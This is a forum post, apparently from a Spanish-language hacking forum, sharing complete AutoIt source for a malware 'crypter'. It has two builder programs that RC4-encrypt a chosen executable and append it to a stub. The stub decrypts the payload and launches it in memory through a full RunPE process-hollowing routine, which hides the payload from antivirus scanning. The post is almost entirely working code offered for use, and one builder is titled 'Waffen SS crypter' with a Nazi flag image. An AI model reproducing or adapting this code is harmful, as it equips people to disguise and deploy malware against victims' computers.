Locked [autoit] Crypter source

[Expermicid]

Cliente:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445'>http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

 

#include

 

#include

 

#include

 

#include

 

#include

 

 

 

 

 

#Region ### START Koda GUI section ### Form=c:\documents and settings\eu\meus documentos\form1.kxf

 

$Form1_1 = GUICreate("Waffen SS crypter by Rudeb0y777 ", 709, 381, 209, 113)

 

$Button1 = GUICtrlCreateButton("Abrir", 104, 160, 139, 65)

 

GUICtrlSetFont(-1, 12, 800, 0, "Algerian")

 

GUICtrlSetColor(-1, 0x0000FF)

 

GUICtrlSetBkColor(-1, 0xD4D0C8)

 

$Button2 = GUICtrlCreateButton("Encriptar", 368, 160, 147, 65)

 

GUICtrlSetFont(-1, 12, 800, 0, "Algerian")

 

GUICtrlSetColor(-1, 0x0000FF)

 

GUICtrlSetBkColor(-1, 0xD4D0C8)

 

$Input1 = GUICtrlCreateInput("Arquivo...", 120, 112, 401, 21)

 

$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Eu\Meus documentos\Meus documentos\Downloads\fotos variadas\waffen-ss-flag2.JPG", 0, 0, 705, 377, BitOR($SS_NOTIFY,$WS_GROUP,$WS_CLIPSIBLINGS))

 

SoundPlay(@WindowsDir & "nova pasta\teste.mp3", 1)

 

SoundSetWaveVolume(100)

 

 

 

GUISetState(@SW_SHOW)

 

#EndRegion ### END Koda GUI section ###

 

 

 

While 1

 

$nMsg = GUIGetMsg()

 

Switch $nMsg

 

Case $GUI_EVENT_CLOSE

 

Exit

 

 

 

Case $Form1_1

 

Case $Button1

 

GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))

 

Case $Button2

 

if GuiCtrlRead($Input1) = "" then return

 

$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)

 

$arquivo2 = FileOpen(GuiCtrlRead($Input1), 16)

 

$st = FileRead($stub)

 

$ar = FileRead($arquivo2)

 

 

 

$ar = _RC4($ar,"LOLxD")

 

Func _RC4($DATA, $KEY)

 

Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"

 

Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")

 

DllStructSetData($CODEBUFFER, 1, $OPCODE)

 

Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")

 

DllStructSetData($BUFFER, 1, $DATA)

 

DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)

 

Local $RET = DllStructGetData($BUFFER, 1)

 

$BUFFER = 0

 

$CODEBUFFER = 0

 

Return $RET

 

 

 

EndFunc

 

$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)

 

 

 

FileWrite($salvar, $st)

 

FileWrite($salvar, StringToBinary("rud777"))

 

FileWrite($salvar, $ar)

 

 

 

FileClose($stub)

 

FileClose($Input1)

 

FileClose($Salvar)

 

MsgBox(64, "Encriptado!!!", "By Rud3b0y777")

 

 

 

 

 

EndSwitch

 

WEnd

[/lenguaje]

 

Otro Cliente:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

#Include

#Include

#Include

#Include

#Include

#Include

 

#Region ### START Koda GUI section ### Form=

Opt("GuiOnEventMode",1)

$a = GUICreate(" Crypter ! Autoit*-*", 378, 406, 192, 124)

GUISetIcon("C:\Documents and Settings\Gilmar\Desktop\projeto novo\icone.ico")

GUISetBkColor(0x000000)

$Pic1 = GUICtrlCreatePic("C:\Documents and Settings\Gilmar\Desktop\Autoit\foto.jpg", 0, 0, 377, 345)

$Abrir = GUICtrlCreateButton("Abrir", 208, 376, 73, 25, $WS_GROUP)

$Cryptar = GUICtrlCreateButton("Cryptar", 296, 376, 73, 25, $WS_GROUP)

$Arquivo = GUICtrlCreateInput("Arquivo", 0, 352, 377, 21)

GUISetOnEvent($Gui_Event_Close, "sr")

GUISetState(@SW_SHOW)

#EndRegion ### END Koda GUI section ###

GUICtrlSetOnEvent($Abrir, "abrir")

GUICtrlSetOnEvent($Cryptar, "Cs")

 

Func abrir()

GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))

EndFunc

 

Func Cs()

 

if GuiCtrlRead($Arquivo) = "" then return

$stub = FileOpen(@ScriptDir & "\Stub.exe" , 16)

$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)

 

$st = FileRead($stub)

$ar = FileRead($arquivo2)

 

$ar = _RC4($ar, "Key")

$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)

 

FileWrite($salvar, $st)

FileWrite($salvar, StringToBinary("Separador"))

FileWrite($salvar, $ar)

 

FileClose($stub)

FileClose($Arquivo)

FileClose($Salvar)

MsgBox(64, " Crypter !", "Encryptado com sucesso !")

EndFunc

Func sr()

Exit

EndFunc

 

While 1

Sleep(1)

WEnd

[/lenguaje]

 

Stub:

 

[lenguaje=autoit] ;Créditos: A.D.I Fênix

;http://www.orkut.com.br/Main#Community?cmm=25309445

;

 

 

#NoTrayIcon

;

$FileStub = Sleep(150)

$file = FileOpen(@ScriptFullPath, 0)

$Data = FileRead($file)

$Data = StringMid($Data, StringInstr($Data, "separador") + StringLen ("separador"))

$Data = _RC4($Data, "key")

_RunPE($Data)

 

Func _RC4($DATA, $KEY)

Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"

Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")

DllStructSetData($CODEBUFFER, 1, $OPCODE)

Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")

DllStructSetData($BUFFER, 1, $DATA)

DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $KEY, "int", 0)

Local $RET = DllStructGetData($BUFFER, 1)

$BUFFER = 0

$CODEBUFFER = 0

Return $RET

EndFunc

 

Func _RunPE($BBINARYIMAGE)

#region 1. PREPROCESSING PASSED

Local $BBINARY = Binary($BBINARYIMAGE)

Local $TBINARY = DllStructCreate("byte[" & BinaryLen($BBINARY) & "]")

DllStructSetData($TBINARY, 1, $BBINARY)

Local $PPOINTER = DllStructGetPtr($TBINARY)

#region 2. CREATING NEW PROCESS

Local $TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")

Local $TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")

Local $ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($TSTARTUPINFO), "ptr", DllStructGetPtr($TPROCESS_INFORMATION))

If @error Or Not $ACALL[0] Then

Return SetError(1, 0, 0)

EndIf

Local $HPROCESS = DllStructGetData($TPROCESS_INFORMATION, "Process")

Local $HTHREAD = DllStructGetData($TPROCESS_INFORMATION, "Thread")

#region 3. FILL CONTEXT STRUCTURE

Local $TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")

DllStructSetData($TCONTEXT, "ContextFlags", 65538)

$ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(2, 0, 0)

EndIf

#region 4. READ PE-FORMAT

Local $TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $PPOINTER)

$PPOINTER += DllStructGetData($TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")

Local $SMAGIC = DllStructGetData($TIMAGE_DOS_HEADER, "Magic")

If Not ($SMAGIC == "MZ") Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(3, 0, 0)

EndIf

Local $TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $PPOINTER)

$PPOINTER += 4

If DllStructGetData($TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(4, 0, 0)

EndIf

Local $TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $PPOINTER)

Local $INUMBEROFSECTIONS = DllStructGetData($TIMAGE_FILE_HEADER, "NumberOfSections")

$PPOINTER += 20

Local $TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $PPOINTER)

$PPOINTER += 96

Local $IMAGIC = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "Magic")

If $IMAGIC <> 267 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(5, 0, 0)

EndIf

Local $IENTRYPOINTNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")

$PPOINTER += 128

Local $POPTIONALHEADERIMAGEBASENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "ImageBase")

Local $IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfImage")

#region 5. CLEAR EVERYTHING THAT THIS NEW PROCESS HAVE MAPPED

$ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW)

If @error Or $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(6, 0, 0)

EndIf

#region 6. ALLOCATE 'NEW' MEMORY SPACE

$ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $HPROCESS, "ptr", $POPTIONALHEADERIMAGEBASENEW, "dword", $IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(7, 0, 0)

EndIf

Local $PREMOTECODE = $ACALL[0]

#region 7. GET AND WRITE NEW PE-HEADERS

Local $PHEADERS_NEW = DllStructGetPtr($TIMAGE_DOS_HEADER)

Local $IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")

$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE, "ptr", $PHEADERS_NEW, "dword", $IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(8, 0, 0)

EndIf

#region 8. WRITE SECTIONS

Local $TIMAGE_SECTION_HEADER

Local $ISIZEOFRAWDATA, $PPOINTERTORAWDATA

Local $IVIRTUALADDRESS

For $I = 1 To $INUMBEROFSECTIONS

$TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $PPOINTER)

$ISIZEOFRAWDATA = DllStructGetData($TIMAGE_SECTION_HEADER, "SizeOfRawData")

$PPOINTERTORAWDATA = DllStructGetPtr($TIMAGE_DOS_HEADER) + DllStructGetData($TIMAGE_SECTION_HEADER, "PointerToRawData")

$IVIRTUALADDRESS = DllStructGetData($TIMAGE_SECTION_HEADER, "VirtualAddress")

If $ISIZEOFRAWDATA Then

$ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $HPROCESS, "ptr", $PREMOTECODE + $IVIRTUALADDRESS, "ptr", $PPOINTERTORAWDATA, "dword", $ISIZEOFRAWDATA, "dword*", 0)

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(9, $I, 0)

EndIf

EndIf

$PPOINTER += 40

Next

#region 9. NEW ENTRY POINT

DllStructSetData($TCONTEXT, "Eax", $PREMOTECODE + $IENTRYPOINTNEW)

#region 10. SET NEW CONTEXT

$ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $HTHREAD, "ptr", DllStructGetPtr($TCONTEXT))

If @error Or Not $ACALL[0] Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(10, 0, 0)

EndIf

#region 11. RESUME THREAD

$ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $HTHREAD)

If @error Or $ACALL[0] = -1 Then

DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $HPROCESS, "dword", 0)

Return SetError(11, 0, 0)

EndIf

#region 12. RETURN SUCCESS

Return DllStructGetData($TPROCESS_INFORMATION, "ProcessId")

EndFunc

 

;Créditos: A.D.I Fênix

[/lenguaje]

 

Fuente: C-51

 

Saludos

Edited February 16, 2014 by Expermicid